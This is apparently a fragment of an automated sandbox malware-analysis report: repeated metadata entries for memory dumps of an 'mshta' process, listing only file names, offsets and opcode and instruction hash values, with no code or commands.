                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25383451521.0000000006A60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6a60000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction ID: 30b6b1edf6f46a203230621576a315285eab9cbe3f5c0c137dab6396ddcbcd4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25381121651.0000000009A50000.00000010.00000800.00020000.00000000.sdmp, Offset: 09A50000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_9a50000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                • Instruction ID: 4602317a24ae10665893ee6370e4a11b031cc41a098305492d6decbe72b6a34a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.25381121651.0000000009A50000.00000010.00000800.00020000.00000000.sdmp, Offset: 09A50000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_9a50000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                • Instruction ID: 4602317a24ae10665893ee6370e4a11b031cc41a098305492d6decbe72b6a34a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57ac055f077beea20eb1848ebeeb1978f180cdc0d061263d96475911880e5786
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: